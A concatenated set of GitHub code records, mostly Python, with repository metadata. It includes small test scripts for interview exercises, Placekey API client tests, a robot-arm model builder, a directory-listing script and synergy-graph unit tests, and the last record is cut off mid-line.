...])\nax2.imshow(y[0,0,...].detach().numpy())\nplt.show()","repo_name":"PICOPON/FRSR","sub_path":"SRCNN/srcnn_detect.py","file_name":"srcnn_detect.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8015633731","text":"# default file imports.\nfrom overlap import check_overlap\nfrom version_check import check_version\nfrom cache import Cache\nimport random\n\ndef overlap_test():\n \"\"\"\n Test case for question A:\n\n Your goal for this question is to write a program that accepts two lines (x1,x2) and (x3,x4) on the\n x-axis and returns whether they overlap. As an example, (1,5) and (2,6) overlaps but not (1,5)\n and (6,8).\n\n :return:\n \"\"\"\n success = True\n\n if check_overlap(1, 2, 3, 4):\n success = False\n print('expected ' + str(False) +' but got ' + str((check_overlap(1, 2, 3, 4))))\n if not check_overlap(1, 3, 2, 4):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 3, 2, 4))))\n if check_overlap(3, 4, 1, 2):\n success = False\n print('expected ' + str(False) +' but got ' + str((check_overlap(3, 4, 1, 2))))\n if not check_overlap(2, 4, 1, 3):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(2, 4, 1, 3))))\n if not check_overlap(2, 3, 1, 4):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(2, 3, 1, 4))))\n if not check_overlap(1, 4, 2, 3):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 4, 2, 3))))\n if not check_overlap(1, 3, 1, 2):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 3, 1, 2))))\n if not check_overlap(1, 4, 2, 4):\n success = False\n print('expected ' + str(True) + ' but got ' + str((check_overlap(1, 4, 2, 4))))\n\n if success:\n print('All overlapping tests successfully performed.\\n')\n else:\n print('All overlapping tests performed. (With errors)\\n')\n\n\ndef version_test():\n \"\"\"\n Test case for question B:\n\n The goal of this question is to write a software library that accepts 2 version string as input and\n returns whether one is greater than, equal, or less than the other. As an example: “1.2” is\n greater than “1.1”. Please provide all test cases you could think of.\n\n :return:\n \"\"\"\n success = True\n\n if check_version('1', '2') != -1:\n success = False\n print(check_version('1', '2'))\n if check_version('1.1', '1.2') != -1:\n success = False\n print(check_version('1.1', '1.2'))\n if check_version('1.3', '1.3.1') != -1:\n success = False\n print(check_version('1.3', '1.3.1'))\n if check_version('1.4', '1.3.12') != 1:\n success = False\n print(check_version('1.4', '1.3.12'))\n if check_version('3.1.1', '3.1.10') != -1:\n success = False\n print(check_version('3.1.1', '3.1.10'))\n if check_version('3.1.1.4321', '3.1.1.4321') != 0:\n success = False\n print(check_version('3.1.1.4321', '3.1.1.4321'))\n if check_version('2', '1') != 1:\n success = False\n print(check_version('2', '1'))\n if check_version('4.2', '1.2') != 1:\n success = False\n print(check_version('4.2', '1.2'))\n if check_version('1.1', '2') != -1:\n success = False\n print(check_version('1.1', '2'))\n if check_version('3.1.3', '3.1.3') != 0:\n success = False\n print(check_version('3.1.3', '3.1.3'))\n if check_version('1', '1.1.12.4444') != -1:\n success = False\n print(check_version('1', '1.1.12.4444'))\n\n if success:\n print('All version tests successfully performed.\\n')\n else:\n print('All version tests performed. (With errors)\\n')\n\n\ndef cache_test():\n \"\"\"\n TEST CASE FOR CACHE SYSTEM.\n\n :return:\n \"\"\"\n # Test the cache\n Keys = [i for i in range(random.randint(1,10))] # Total Entries\n place = [\n 'Imalia', 'Brazil', 'Canada', 'Zimbabawe',\n 'Saturn?', 'New Zealand', 'São Paulo', 'Dubai',\n 'Mars?', 'Singapore', 'Los Angeles', 'Santos',\n 'São Tomé', 'Luxemburg', 'New Deli', 'Abu Dhabi',\n 'São Vicente',\n ]\n\n # Cache object\n cache = Cache()\n\n # Updating Cache with entries\n for i, key in enumerate(Keys):\n if key in cache:\n continue\n else:\n value = ''.join([random.choice(place)])\n print('\\t', value)\n cache.update(key, value)\n\n print(\"{0}.Iteration, #{1} cached entries\".format(i + 1, cache.size()))\n\n # Cache List\n print('\\n\\n\\t', '*' * 10, ' Places List ', '*' * 10)\n for k, v in cache.view().items():\n print(\"{0} : {1}\".format(k, v))\n\n print(\"Cache size: \", cache.size())\n\n print(\"Cache overview: \", cache.view())\n\n print(\"delete the oldest item from cache: \", cache.delete())\n\n print(\"Erasing the cache: \", cache.empty())\n\n # end of the test\n print('_' * 60)\n\nprint('_' * 30)\nprint('Test for Question A: Overlapping lines')\noverlap_test()\n\n\nprint('_' * 30)\nprint('Test for Question B: Version check')\nversion_test()\n\n\nprint('_' * 30)\nprint('Test for Question C: Cache System?')\ncache_test()\n","repo_name":"Messhias/ormuco-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31029229286","text":"\"\"\"\nPlacekey API client tests.\n\nTo exclude slow tests run `pytest -m\"not slow\" placekey/tests/test_api.py`.\n\"\"\"\n\nimport os\nimport unittest\nimport pytest\nimport random\nfrom placekey.api import PlacekeyAPI\n\n\nclass TestAPI(unittest.TestCase):\n \"\"\"\n Tests for api.py\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.api_key = os.getenv('PLACEKEY_API_KEY')\n\n def setUp(self):\n if not self.api_key:\n self.fail('The PLACEKEY_API_KEY environment variable must be set to run tests.')\n\n self.pk_api = PlacekeyAPI(\n api_key=self.api_key, user_agent_comment=\"placekey-py-tests\")\n\n def test_lookup_placekey(self):\n \"\"\"\n test lookup_placekey\n \"\"\"\n # A lat/long query\n self.assertDictEqual(\n self.pk_api.lookup_placekey(latitude=37.7371, longitude=-122.44283),\n {'query_id': '0', 'placekey': '@5vg-82n-kzz'}\n )\n\n # An address query\n place = {\n \"street_address\": \"598 Portola Dr\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94131\",\n \"iso_country_code\": \"US\"\n }\n self.assertDictEqual(\n self.pk_api.lookup_placekey(**place, strict_address_match=True),\n {'query_id': '0', 'placekey': '227@5vg-82n-pgk'}\n )\n\n # An invalid query\n bad_place = {\n \"street_address\": \"598 Portola Dr\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94131\",\n \"iso_country_code\": \"US\",\n \"something\": \"foo\"\n }\n self.assertFalse(\n self.pk_api._validate_query(bad_place)\n )\n\n def test_lookup_placekeys(self):\n \"\"\"\n Test lookup_placekeys\n\n This test also covers lookup_batch, as lookup_placekeys is a wrapper\n for that function.\n \"\"\"\n places = [\n {\n \"street_address\": \"1543 Mission Street, Floor 3\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94105\",\n \"iso_country_code\": \"US\"\n },\n {\n \"query_id\": \"thisqueryidaloneiscustom\",\n \"location_name\": \"Twin Peaks Petroleum\",\n \"street_address\": \"598 Portola Dr\",\n \"city\": \"San Francisco\",\n \"region\": \"CA\",\n \"postal_code\": \"94131\",\n \"iso_country_code\": \"US\"\n },\n {\n \"latitude\": 37.7371,\n \"longitude\": -122.44283\n }\n ]\n self.assertListEqual(\n self.pk_api.lookup_placekeys(places),\n [\n {'query_id': 'place_0', 'placekey': '226@5vg-7gq-5mk'},\n {'query_id': 'thisqueryidaloneiscustom', 'placekey': '227-222@5vg-82n-pgk'},\n {'query_id': 'place_2', 'placekey': '@5vg-82n-kzz'}\n ]\n )\n\n @pytest.mark.slow\n def test_lookup_placekeys_slow(self):\n \"\"\"\n Longer running rate-limit test for lookup_placekeys. This should run and\n get a valid result for each item queried.\n \"\"\"\n random.seed(1)\n num_samples = 10000\n lat_long_samples = [\n {'latitude': random.uniform(-90.0, 90.0), 'longitude': random.uniform(0.0, 180.0)}\n for _ in range(num_samples)\n ]\n results = self.pk_api.lookup_placekeys(lat_long_samples)\n self.assertEqual(len(results), num_samples)\n self.assertTrue(all(['placekey' in r for r in results]))\n","repo_name":"Placekey/placekey-py","sub_path":"placekey/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"42013303598","text":"import Structure\ndef BuildDefaultuArm():\n uArm_Base=Structure.Base(\"uArm_Base\")\n TurnTable=Structure.TurnTable(\"TurnTable\")\n Arm1=Structure.Arm(\"Arm1\",[[8,-16,192],[8,16,192],[-55,16,192],[8,-16,0]],[0,0,142])\n Arm1.LimInterval=[-40,90]\n Arm1.TurnedAngle=-40\n Arm2=Structure.Arm(\"Arm2\",[[0,-10,158.8],[-60,-10,158.8],[-60,10,158.8],[0,-10,0]],[0,0,158.8])\n Arm2.LimInterval=[0,180]\n Arm2.TurnedAngle=180\n ArmLvl=Structure.ArmLvl(\"ArmLvl\",[[44.5,-15,35],[44.5,15,35],[-44.5,15,35],[44.5,-15,-25]],[44.5,0,0])\n TurnTable.ConnectPre(uArm_Base)\n Arm1.ConnectPre(TurnTable)\n Arm2.ConnectPre(Arm1)\n ArmLvl.ConnectPre(Arm2)\n return uArm_Base\n","repo_name":"shendeguize/DeeCamp-2018-RobotArm","sub_path":"Common/Virtual-uArm/Code-Python/Build_uArm.py","file_name":"Build_uArm.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74453425446","text":"# Title : Chapter : 6 - item : 3 - POWER!\n\ndef power(n, p) :\n if p > 0 :\n # print(n,p)\n return n * power(n, p - 1)\n elif p == 0 :\n return 1\n\nif __name__ == '__main__' :\n a, b = map(int, input('Enter Input a b : ').split())\n print(power(a, b))","repo_name":"Charonyx/DataStruct2564","sub_path":"Chap06 Recursion/chap06_3power.py","file_name":"chap06_3power.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3188808089","text":"from grave import FactorizationMachine\nfrom utils import RandomVectors\n\n\nif __name__ == '__main__':\n\n fm = FactorizationMachine.load_model(\"../out/all_stable_bandgap_dim20.fm.ctx10_add_cont.model\")\n atom_vectors = fm.W\n\n elems = list(fm.dictionary.keys())\n\n rv = RandomVectors(elems=elems, dim=20, mean=0, std=1)\n\n rv.save(\"../out/all_stable_bandgap_dim20.random.model\")\n","repo_name":"lantunes/materials-sandbox","sub_path":"scripts/create_random_vectors.py","file_name":"create_random_vectors.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71259372327","text":"# This script is meant to crawl through a user selected hard drive,\n# and show them all their folders;\nimport os\n\n# choose a drive\ndriveLetter = input('Enter drive letter: ')\n\ndriveName = driveLetter + ':/'\n\n# Building a class to handle directories\n# Might be a good idea to determine a root folder\nclass DirectoryManager:\n def __init__(self, dir, drive):\n self.drive = drive\n self.dir = dir\n\n # Function to get directory count of chosen drive\n def getDirectoryCount(self):\n if os.path.exists(self.drive):\n count = 0\n allDirectories = os.listdir(self.drive)\n for name in allDirectories:\n count = count+1\n fileAndFolder = (\"File and Folder count: %d\" % count)\n return fileAndFolder\n else:\n return \"Drive doesn't exist or improper format\"\n\n # Function to list all folders/directories within drive\n def listAllDirectories(self):\n if os.path.exists(self.drive):\n allDirectories = os.listdir(self.drive)\n return allDirectories\n else:\n return \"Drive doesn't exist or improper format\"\n\n\n\n\n\ndDrive = DirectoryManager('', driveName)\nprint(dDrive.getDirectoryCount())\nprint(dDrive.listAllDirectories())","repo_name":"zachcyrus/PythonPractice","sub_path":"FolderSizes/FileSize.py","file_name":"FileSize.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39879652129","text":"import pytest\nimport itertools\nimport copy\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom src.synergy import *\nfrom src.synergy_graph import *\nfrom src.weight_fns import *\nfrom src.normal_distribution import *\nfrom src.observation_set import *\n\ndef get_figure_3_synergy_graph():\n\t\"\"\"\n\tbuild the graph in figure 3 of paper by Liemhetcharat and Veloso\n\t\"\"\"\n\tG = nx.Graph()\n\tG.add_edge(1,2)\n\tG.add_edge(2,4)\n\tG.add_edge(4,1)\n\tG.add_edge(4,5)\n\tG.add_edge(5,6)\n\tG.add_edge(6,3)\n\n\t# Create dict of normal distributions for M=1 tasks\n\tN = dict()\n\tN[1] = [NormalDistribution(5,1)]\n\tN[2] = [NormalDistribution(5,2)]\n\tN[3] = [NormalDistribution(23,4)]\n\tN[4] = [NormalDistribution(20,7)]\n\tN[5] = [NormalDistribution(10,3)]\n\tN[6] = [NormalDistribution(8,1)]\n\n\t# Create graph\n\tS = SynergyGraph(G, N)\n\treturn S\n\n\ndef get_figure_3_synergy_graph_zero_indexed():\n\t\"\"\"\n\tbuild the graph in figure 3 of paper by Liemhetcharat and Veloso\n\twith agents indexed from 0\n\t\"\"\"\n\tG = nx.Graph()\n\tG.add_edge(0,1)\n\tG.add_edge(1,3)\n\tG.add_edge(3,0)\n\tG.add_edge(3,4)\n\tG.add_edge(4,5)\n\tG.add_edge(5,2)\n\n\t# Create dict of normal distributions for M=1 tasks\n\tN = dict()\n\tN[0] = [NormalDistribution(5,1)]\n\tN[1] = [NormalDistribution(5,2)]\n\tN[2] = [NormalDistribution(23,4)]\n\tN[3] = [NormalDistribution(20,7)]\n\tN[4] = [NormalDistribution(10,3)]\n\tN[5] = [NormalDistribution(8,1)]\n\n\t# Create graph\n\tS = SynergyGraph(G, N)\n\treturn S\n\ndef get_random_synergy_graph(num_agents, M, gamma):\n\t\"\"\"\n\tcreate a random synergy graph with a given number of agents,\n\ta specified number of subtasks and gamma\n\t\"\"\"\n\tnearest_neighbors = 3\n\trewire_prob = 0.3\n\tG = nx.generators.random_graphs.connected_watts_strogatz_graph(num_agents, nearest_neighbors, rewire_prob)\n\tN = dict()\n\tfor agent in range(num_agents):\n\t\t# random mean between [-gamma, gamma]\n\t\t# random variance between [0.1, gamma]\n\t\tN[agent] = [NormalDistribution(random.random() * 2 * gamma - gamma, random.random() * gamma + 0.1) for m in range(M)]\n\treturn SynergyGraph(G, N)\n\ndef test_weight_fn_reciprocal():\n\tassert weight_fn_reciprocal(1) == 1\n\tassert weight_fn_reciprocal(2) == 0.5\n\ndef test_weight_fn_exponential():\n\tassert weight_fn_exponential(0, 1) == 1\n\tassert weight_fn_exponential(1, 1) == 2\n\tassert weight_fn_exponential(5, 1) == 2 ** 5\n\ndef test_value_fn_sum():\n\tp = 0.5\n\ta_distributions = [NormalDistribution(1,1), NormalDistribution(2,2)]\n\ta_0_eval = NormalDistribution(1,1).evaluate(p)\n\ta_1_eval = NormalDistribution(2,2).evaluate(p)\n\tassert value_fn_sum(a_distributions, p) == (a_0_eval + a_1_eval)\n\n\tb_distributions = [NormalDistribution(4,5), NormalDistribution(6,7)]\n\tb_0_eval = NormalDistribution(4,5).evaluate(p)\n\tb_1_eval = NormalDistribution(6,7).evaluate(p)\n\tassert value_fn_sum(b_distributions, p) == (b_0_eval + b_1_eval)\n\ndef test_value_fn_with_synergy_repeat():\n\tS = get_figure_3_synergy_graph()\n\tp = 0.5\n\tf = lambda team: value_fn_sum(synergy(S, team, weight_fn_reciprocal), p)\n\n\tA1 = [5,2,6]\n\tvalue_A1 = f(A1)\n\tA2 = [2,5,6]\n\tvalue_A2 = f(A2)\n\tA3 = [6,2,5]\n\tvalue_A3 = f(A3)\n\n\tassert value_A1 == value_A2\n\tassert value_A2 == value_A3\n\tassert value_A1 == value_A3\n\ndef test_elementwise_add():\n\ta_distributions = [NormalDistribution(1,1)]\n\tb_distributions = [NormalDistribution(4,5)]\n\tresult = elementwise_add(a_distributions, b_distributions)\n\tassert result == [NormalDistribution(5,6)]\n\n\ta_distributions = [NormalDistribution(1,1), NormalDistribution(2,2)]\n\tb_distributions = [NormalDistribution(4,5), NormalDistribution(6,7)]\n\tresult = elementwise_add(a_distributions, b_distributions)\n\tassert result == [NormalDistribution(5,6), NormalDistribution(8,9)]\n\ndef test_pairwise_synergy():\n\t# Create a path graph\n\tG = nx.generators.classic.path_graph(3)\n\tassert list(G.nodes()) == [0, 1, 2]\n\n\t# Create dict of normal distributions for M=2 tasks\n\tN = dict()\n\tN[0] = [NormalDistribution(0,1), NormalDistribution(1,2)]\n\tN[1] = [NormalDistribution(2,3), NormalDistribution(3,4)]\n\tN[2] = [NormalDistribution(4,5), NormalDistribution(5,6)]\n\n\t# Create and query graph\n\tS = SynergyGraph(G, N)\n\n\t# Get pairwise synergy for nodes 0 and 2\n\tpair_synergy = pairwise_synergy(S, weight_fn_reciprocal, 0, 2)\n\tassert pair_synergy == [0.5 * NormalDistribution(4,6), 0.5 * NormalDistribution(6,8)]\n\ndef test_synergy_with_figure_3():\n\tS = get_figure_3_synergy_graph()\n\n\t# Get synergy of different teams described at the end of Section 3.2\n\tteam_A = [1,2]\n\tteam_A_synergy = synergy(S, team_A, weight_fn_reciprocal)\n\tassert len(team_A_synergy) == 1\n\tassert team_A_synergy[0].mean == 10\n\n\tteam_B = [1,2,3]\n\tteam_B_synergy = synergy(S, team_B, weight_fn_reciprocal)\n\tassert len(team_B_synergy) == 1\n\tassert team_B_synergy[0].mean == 8\n\n\tteam_C = [1,2,4]\n\tteam_C_synergy = synergy(S, team_C, weight_fn_reciprocal)\n\tassert len(team_C_synergy) == 1\n\tassert team_C_synergy[0].mean == 20\n\n\t# Check final task values\n\tp = 0.50\n\tteam_A_value = team_A_synergy[0].evaluate(p)\n\tteam_B_value = team_B_synergy[0].evaluate(p)\n\tteam_C_value = team_C_synergy[0].evaluate(p)\n\tassert team_A_value > team_B_value\n\tassert team_C_value > team_B_value\n\tassert team_C_value > team_A_value\n\ndef test_random_team_neighbor_full_team():\n\tmathcal_A = [1,2,3,4]\n\tA = [1,2,3,4]\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert A == B\n\ndef test_random_team_neighbor_1():\n\tmathcal_A = [1,2,3,4]\n\tA = [1,2,3]\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert len(B) == 3\n\tassert (4 in B)\n\ndef test_random_team_neighbor_2():\n\tmathcal_A = [4,3,2,1]\n\tA = [1,2]\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert len(B) == 2\n\tassert (1 not in B) or (2 not in B)\n\ndef test_random_team_neighbor_3():\n\tmathcal_A = [4,3,2,1]\n\tA = [1,2]\n\toriginal_A = A.copy()\n\tB = random_team_neighbor(mathcal_A, A)\n\tassert len(A) == 2\n\tassert A == original_A\n\ndef test_random_team_neighbor_runtime_err():\n\tmathcal_A = []\n\tA = [1,2,3,4]\n\twith pytest.raises(RuntimeError) as excinfo:\n\t\tB = random_team_neighbor(mathcal_A, A)\n\tassert \"no agents available\" in str(excinfo.value)\n\ndef test_get_approx_optimal_team_figure_3():\n\tS = get_figure_3_synergy_graph()\n\tmathcal_A = [1,2,3,4,5,6]\n\tn = 3\n\tp = 0.50\n\tk_max = 100\n\tapprox_A, approx_value, approx_teams, approx_values = get_approx_optimal_team(S, mathcal_A, n, p, k_max, weight_fn_reciprocal)\n\n\t# Optimal teams of size 3 (to test the solution found by annealing)\n\t# [3,5,6] with value 21.8333\n\t# [1,4,5] with value 20.8333\n\t# [2,4,5] with value 20.8333\n\t# [4,5,6] with value 20.6666\n\t# [3,4,5] with value 20.2777\n\n\tfound_team_1 = set(approx_A) == set([3,5,6]) and np.round(approx_value, 3) == 21.833\n\tfound_team_2 = set(approx_A) == set([1,4,5]) and np.round(approx_value, 3) == 20.833\n\tfound_team_3 = set(approx_A) == set([2,4,5]) and np.round(approx_value, 3) == 20.833\n\t\n\tassert found_team_1 or found_team_2 or found_team_3\n\tassert len(approx_teams) == len(approx_values)\n\tassert len(approx_values) <= k_max\n\tassert approx_A == approx_teams[-1]\n\tassert approx_value == approx_values[-1]\n\ndef test_get_approx_optimal_team_brute_figure_3():\n\tS = get_figure_3_synergy_graph()\n\tmathcal_A = [1,2,3,4,5,6]\n\tp = 0.50\n\tk_max = 100\n\tbrute_best_team, brute_best_value = get_approx_optimal_team_brute(S, mathcal_A, p, k_max, weight_fn_reciprocal)\n\n\t# Optimal teams (to test the solution found by annealing)\n\t# [3,6] with value 31.0\n\t# [4,5] with value 30.0\n\t# [1,4] with value 25.0\n\t# [2,4] with value 25.0\n\t# [3,5,6] with value 21.8333\n\n\tfound_team_1 = set(brute_best_team) == set([3,6]) and np.round(brute_best_value, 3) == 31.0\n\tfound_team_2 = set(brute_best_team) == set([4,5]) and np.round(brute_best_value, 3) == 30.0\n\tfound_team_3 = set(brute_best_team) == set([1,4]) and np.round(brute_best_value, 3) == 25.0\n\n\tassert found_team_1 or found_team_2 or found_team_3\n\ndef test_random_graph_neighbor_1():\n\tG = nx.generators.classic.path_graph(6)\n\tinitial_nodes = [n for n in G]\n\tinitial_edges = [e for e in G.edges]\n\n\tH = random_graph_neighbor(G)\n\tnew_nodes = [n for n in H]\n\tnew_edges = [e for e in H.edges]\n\n\tassert len(new_nodes) == len(initial_nodes)\n\tassert (len(new_edges) - 1) == len(initial_edges) or (len(new_edges) + 1) == len(initial_edges)\n\tassert new_edges != initial_edges\n\tassert new_nodes == initial_nodes\n\ndef test_random_graph_neighbor_2():\n\tG = nx.Graph()\n\tG.add_edge(1,2)\n\tG.add_edge(2,4)\n\tG.add_edge(4,1)\n\tG.add_edge(4,5)\n\tG.add_edge(5,6)\n\tG.add_edge(6,3)\n\n\tinitial_nodes = [n for n in G]\n\tinitial_edges = [e for e in G.edges]\n\n\tH = random_graph_neighbor(G)\n\tnew_nodes = [n for n in H]\n\tnew_edges = [e for e in H.edges]\n\n\tassert len(new_nodes) == len(initial_nodes)\n\tassert (len(new_edges) - 1) == len(initial_edges) or (len(new_edges) + 1) == len(initial_edges)\n\tassert new_edges != initial_edges\n\tassert new_nodes == initial_nodes\n\ndef test_random_graph_neighbor_3():\n\t\"\"\"\n\tcheck that the synergy graph can be iterated with \n\trandom graph neighbor\n\t\"\"\"\n\tS = get_figure_3_synergy_graph()\n\tinitial_nodes = [n for n in S.graph.nodes]\n\tinitial_edges = [e for e in S.graph.edges]\n\n\tG = random_graph_neighbor(S.graph)\n\n\tnew_nodes = [n for n in G.nodes]\n\tnew_edges = [e for e in G.edges]\n\n\tassert len(new_nodes) == len(initial_nodes)\n\tassert (len(new_edges) - 1) == len(initial_edges) or (len(new_edges) + 1) == len(initial_edges)\n\tassert new_edges != initial_edges\n\tassert new_nodes == initial_nodes\n\ndef test_log_likelihood_w_graph_neighbor():\n\t\"\"\"\n\tcheck that the log likelihood of observations changes\n\twith a random graph neighbor of a synergy graph\n\t\"\"\"\n\tS = get_figure_3_synergy_graph()\n\tM = 1\n\tA = [1,2,3]\n\to1 = [[3], [4], [5]]\n\tobservation_group = ObservationGroup(A, M)\n\tobservation_group.add_observations(o1)\n\n\tA2 = [3,4]\n\to2 = [[30], [40], [30], [35]]\n\tobservation_group2 = ObservationGroup(A2, M)\n\tobservation_group2.add_observations(o2)\n\tobservation_set = ObservationSet(M, [observation_group, observation_group2])\n\t\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\tH = random_graph_neighbor(S.graph)\n\tS_prime = SynergyGraph(H, S.normal_distributions)\n\tlikelihood2 = log_likelihood(observation_set, S_prime, weight_fn_reciprocal)\n\tassert np.round(likelihood, 3) != np.round(likelihood2, 3)\n\ndef create_observation_group(S, A, M, group_size):\n\t\"\"\"\n\thelper function to create an observation group\n\t\"\"\"\n\tsynergy_A = synergy(S, A, weight_fn_reciprocal)\n\togroup = ObservationGroup(A, M)\n\tobservations = []\n\tfor i in range(group_size):\n\t\tobservation = list(map(lambda distr: distr.sample(1).item(), synergy_A))\n\t\tobservations.append(observation)\n\togroup.add_observations(observations)\n\treturn ogroup\n\ndef create_observation_set(S, As, M, group_size):\n\t\"\"\"\n\thelper function to create an observation set from a list of teams\n\t\"\"\"\n\togroups = []\n\tfor A in As:\n\t\tgroup = create_observation_group(S, A, M, group_size)\n\t\togroups.append(group)\n\tos = ObservationSet(M, ogroups)\n\treturn os\n\ndef test_log_likelihood_1():\n\t\"\"\"\n\tconsider a large set of agents, but only with observations\n\tfor a small subset (no asserts, just checking that there are no errors)\n\t\"\"\"\n\tM = 3\n\tmathcal_A = [0,1,2,3,4,5]\n\n\tA = [0,1,2]\n\to1 = [[3,3,3], [4,4,4], [5,5,5]]\n\tobservation_group = ObservationGroup(A, M)\n\tobservation_group.add_observations(o1)\n\tobservation_set = ObservationSet(M, [observation_group])\n\n\tnum_agents = len(mathcal_A)\n\tnearest_neighbors = 3\n\trewire_prob = 0.3\n\tG = nx.generators.random_graphs.connected_watts_strogatz_graph(num_agents, nearest_neighbors, rewire_prob)\n\tN = estimate_capability(observation_set, G, weight_fn_reciprocal)\n\n\tS = SynergyGraph(G, N)\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\ndef test_log_likelihood_2():\n\t\"\"\"\n\tcreate some synthetic observations from the synergy graph\n\tand ensure their log likelihood is higher than random handcrafted observations\n\t\"\"\"\n\tM = 1\n\tS = get_figure_3_synergy_graph()\n\tobservation_group_size = 50\n\t\n\tAs = [[1,2,4], [1,2], [2,5], [2,6], [2,3], [3,6], [4,5,6], [5,6,3], [1,4,5], [1,5,3]]\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\n\t# Change distributions\n\tS_prime = copy.deepcopy(S)\n\tS_prime.normal_distributions[3] = [NormalDistribution(3, 1)]\n\tS_prime.normal_distributions[4] = [NormalDistribution(17, 5)]\n\tobservation_set2 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood2 = log_likelihood(observation_set2, S, weight_fn_reciprocal)\n\n\tassert likelihood > likelihood2\n\n\t# Change distributions further\n\tS_prime.normal_distributions[1] = [NormalDistribution(30, 1)]\n\tS_prime.normal_distributions[5] = [NormalDistribution(2, 1)]\n\tobservation_set3 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood3 = log_likelihood(observation_set3, S, weight_fn_reciprocal)\n\n\tassert likelihood2 > likelihood3\n\ndef test_log_likelihood_3():\n\t\"\"\"\n\tcreate some synthetic observations from the synergy graph\n\tand ensure their log likelihood is higher than random handcrafted observations\n\tthis time with fewer teams\n\t\"\"\"\n\tM = 1\n\tS = get_figure_3_synergy_graph()\n\tobservation_group_size = 50\n\n\tAs = [[2,5], [2,6]]\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\tlikelihood = log_likelihood(observation_set, S, weight_fn_reciprocal)\n\n\t# Change distributions\n\tS_prime = copy.deepcopy(S)\n\tS_prime.normal_distributions[6] = [NormalDistribution(3, 1)]\n\tobservation_set2 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood2 = log_likelihood(observation_set2, S, weight_fn_reciprocal)\n\n\tassert likelihood > likelihood2\n\n\t# Change distributions further\n\tS_prime.normal_distributions[5] = [NormalDistribution(2, 1)]\n\tobservation_set3 = create_observation_set(S_prime, As, M, observation_group_size)\n\tlikelihood3 = log_likelihood(observation_set3, S, weight_fn_reciprocal)\n\n\tassert likelihood2 > likelihood3\n\ndef test_log_likelihood_4():\n\t\"\"\"\n\tensure that when sampling from one of two distributions, \n\twe have that the likelihood of the true distribution is greater\n\t\"\"\"\n\tdistr1 = NormalDistribution(5, 3)\n\tdistr2 = NormalDistribution(7, 3)\n\n\tsample1 = distr1.sample(50)\n\tsample2 = distr2.sample(50)\n\n\tlikelihood_sample_1_from_distr1 = 0\n\tlikelihood_sample_1_from_distr2 = 0\n\tfor s in sample1:\n\t\tlikelihood_sample_1_from_distr1 += distr1.logpdf(s)\n\t\tlikelihood_sample_1_from_distr2 += distr2.logpdf(s)\n\tassert likelihood_sample_1_from_distr1 > likelihood_sample_1_from_distr2\n\n\tlikelihood_sample_2_from_distr1 = 0\n\tlikelihood_sample_2_from_distr2 = 0\n\tfor s in sample2:\n\t\tlikelihood_sample_2_from_distr1 += distr1.logpdf(s)\n\t\tlikelihood_sample_2_from_distr2 += distr2.logpdf(s)\n\tassert likelihood_sample_2_from_distr1 < likelihood_sample_2_from_distr2\n\n# Test case turned off (due to runtime), but it has passed!\ndef off_test_create_synergy_graph_1():\n\t\"\"\"\n\tuse the figure 3 synergy graph and create synthetic observations, \n\tthen check that we arrive at approximately same graph through annealing\n\tand that length of graphs and values are equal in length\n\t\"\"\"\n\tM = 1\n\tS = get_figure_3_synergy_graph_zero_indexed()\n\tagents = list(S.graph.nodes)\n\tk_max = 100\n\n\tAs = [list(i) for i in itertools.combinations(agents, r=2)] + \\\n\t [list(i) for i in itertools.combinations(agents, r=3)]\n\tobservation_group_size = 100\n\tobservation_set = create_observation_set(S, As, M, observation_group_size)\n\n\tfinal_sgraph, final_value, sgraphs, values = create_synergy_graph(observation_set, agents, weight_fn_reciprocal, k_max, display=True)\n\tassert len(sgraphs) == len(values)\n\tassert len(values) <= k_max\n\tassert final_value == values[-1]\n\n# Test case turned off (due to runtime), but it has passed!\ndef off_test_create_synergy_graph_2():\n\t\"\"\"\n\tusing a random synergy graph, create synthetic observations, \n\tthen check that we arrive at approximately same graph through annealing\n\tand plot log likelihood error\n\t\"\"\"\n\tM = 1 \n\tnum_agents = 10\n\tgamma = 10\n\tk_max = 200\n\tS = get_random_synergy_graph(num_agents, M, gamma)\n\tagents = list(S.graph.nodes)\n\n\tAs = [list(i) for i in itertools.combinations(agents, r=2)] + \\\n\t [list(i) for i in itertools.combinations(agents, r=3)]\n\tobservation_group_size = 100\n\tobservation_set = 